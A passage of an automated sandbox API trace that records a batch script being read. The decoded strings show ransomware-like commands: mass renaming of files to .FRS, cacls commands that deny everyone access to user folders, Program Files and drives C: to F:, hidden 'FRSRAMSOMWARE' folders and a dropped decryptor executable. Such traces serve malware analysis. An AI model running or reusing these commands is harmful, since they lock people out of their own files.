dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0143.805] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0143.805] SetFilePointer (in: hFile=0x154, lDistanceToMove=606, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0143.805] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"F:\\*.*\" *.*.FRS\r\n") returned 22 [0143.805] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0143.805] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.805] GetFileType (hFile=0x154) returned 0x1 [0143.805] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0143.805] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0143.805] SetFilePointer (in: hFile=0x154, lDistanceToMove=669, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0143.805] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=63, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" /e /d everyone\r\net n=%%i\r\n") returned 63 [0143.806] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0143.806] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.806] GetFileType (hFile=0x154) returned 0x1 [0143.806] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0143.806] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0143.806] SetFilePointer (in: hFile=0x154, lDistanceToMove=736, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0143.806] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=67, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" /e /d everyone\r\n=%%i\r\n") returned 67 [0143.806] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0143.806] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.806] GetFileType (hFile=0x154) returned 0x1 [0143.806] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0143.806] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0143.806] SetFilePointer (in: hFile=0x154, lDistanceToMove=797, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0143.806] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=61, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Links\\*.*\" /e /d everyone\r\nyone\r\n") returned 61 [0143.806] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0143.806] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.806] GetFileType (hFile=0x154) returned 0x1 [0143.806] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0143.806] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0143.806] SetFilePointer (in: hFile=0x154, lDistanceToMove=862, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0143.806] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=65, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" /e /d everyone\r\n\r\n") returned 65 [0143.806] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0143.807] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.807] GetFileType (hFile=0x154) returned 0x1 [0143.807] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0143.807] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0143.807] SetFilePointer (in: hFile=0x154, lDistanceToMove=926, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0143.807] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Searches\\*.*\" /e /d everyone\r\n\n") returned 64 [0143.807] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0143.807] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.807] GetFileType (hFile=0x154) returned 0x1 [0143.807] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0143.807] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0143.807] SetFilePointer (in: hFile=0x154, lDistanceToMove=988, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0143.807] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=62, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Videos\\*.*\" /e /d everyone\r\n\r\n") returned 62 [0143.807] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0143.807] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.807] GetFileType (hFile=0x154) returned 0x1 [0143.807] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0143.807] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0143.807] SetFilePointer (in: hFile=0x154, lDistanceToMove=1052, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0143.807] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" /e /d everyone\r\n") returned 64 [0143.807] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0143.807] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.807] GetFileType (hFile=0x154) returned 0x1 [0143.807] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0143.808] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0143.808] SetFilePointer (in: hFile=0x154, lDistanceToMove=1103, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0143.808] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\Public\\*.*\" /e /d everyone\r\n/d everyone\r\n") returned 51 [0143.808] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0143.808] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.808] GetFileType (hFile=0x154) returned 0x1 [0143.808] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0143.808] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0143.808] SetFilePointer (in: hFile=0x154, lDistanceToMove=1155, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0143.808] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=52, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Program Files\\*.*\" /e /d everyone\r\nd everyone\r\n") returned 52 [0143.808] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0143.808] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.808] GetFileType (hFile=0x154) returned 0x1 [0143.808] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0143.808] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0143.808] SetFilePointer (in: hFile=0x154, lDistanceToMove=1193, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0143.808] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\*.*\" /e /d everyone\r\n /d everyone\r\n") returned 38 [0143.808] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0143.808] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.808] GetFileType (hFile=0x154) returned 0x1 [0143.808] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0143.808] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0143.809] SetFilePointer (in: hFile=0x154, lDistanceToMove=1231, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0143.809] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"D:\\*.*\" /e /d everyone\r\n") returned 38 [0143.809] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0143.809] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.809] GetFileType (hFile=0x154) returned 0x1 [0143.809] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0143.809] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0143.809] SetFilePointer (in: hFile=0x154, lDistanceToMove=1269, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0143.809] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"E:\\*.*\" /e /d everyone\r\n") returned 38 [0143.809] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0143.809] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.809] GetFileType (hFile=0x154) returned 0x1 [0143.809] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0143.809] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0143.809] SetFilePointer (in: hFile=0x154, lDistanceToMove=1307, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0143.809] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"F:\\*.*\" /e /d everyone\r\n") returned 38 [0143.809] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0143.809] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.809] GetFileType (hFile=0x154) returned 0x1 [0143.809] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0143.809] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0143.809] SetFilePointer (in: hFile=0x154, lDistanceToMove=1315, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0143.809] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 3\r\nacls \"F:\\*.*\" /e /d everyone\r\n") returned 8 [0143.810] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0143.810] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.810] GetFileType (hFile=0x154) returned 0x1 [0143.810] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0143.810] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0143.810] SetFilePointer (in: hFile=0x154, lDistanceToMove=1317, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0143.810] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 3\r\n") returned 2 [0143.810] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0143.810] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.810] GetFileType (hFile=0x154) returned 0x1 [0143.810] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0143.810] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0143.810] SetFilePointer (in: hFile=0x154, lDistanceToMove=1321, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0143.810] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":3\r\n 3\r\n") returned 4 [0143.810] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0143.810] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.810] GetFileType (hFile=0x154) returned 0x1 [0143.810] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0143.810] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0143.810] SetFilePointer (in: hFile=0x154, lDistanceToMove=1342, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0143.810] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="md C:\\FRSRAMSOMWARE\r\n /e /d everyone\r\n") returned 21 [0143.810] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0143.811] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.811] GetFileType (hFile=0x154) returned 0x1 [0143.811] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0143.811] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0143.811] SetFilePointer (in: hFile=0x154, lDistanceToMove=1379, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0143.811] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRSRAMSOMWARE\r\n\n") returned 37 [0143.811] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0143.811] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.811] GetFileType (hFile=0x154) returned 0x1 [0143.811] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0143.811] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0143.811] SetFilePointer (in: hFile=0x154, lDistanceToMove=1395, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0143.811] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=16, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="md C:\\FRS_TEMP\r\n+r C:\\FRSRAMSOMWARE\r\n") returned 16 [0143.811] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0143.811] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.811] GetFileType (hFile=0x154) returned 0x1 [0143.811] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0143.811] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0143.811] SetFilePointer (in: hFile=0x154, lDistanceToMove=1427, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0143.811] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRS_TEMP\r\nARE\r\n") returned 32 [0143.811] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0143.811] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.811] GetFileType (hFile=0x154) returned 0x1 [0143.811] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0143.812] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0143.812] SetFilePointer (in: hFile=0x154, lDistanceToMove=1462, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0143.812] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo.encrypt>C:\\FRS_TEMP\\temp.txt\r\n\r\n") returned 35 [0143.812] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0143.812] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.812] GetFileType (hFile=0x154) returned 0x1 [0143.812] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0143.812] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0143.812] SetFilePointer (in: hFile=0x154, lDistanceToMove=1542, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0143.812] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=80, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\Users\\%username%\\Desktop\\FRS_Decryptor.exe\r\npng\r\n") returned 80 [0143.812] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0143.812] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.812] GetFileType (hFile=0x154) returned 0x1 [0143.812] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0143.812] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0143.812] SetFilePointer (in: hFile=0x154, lDistanceToMove=1626, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0143.812] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, 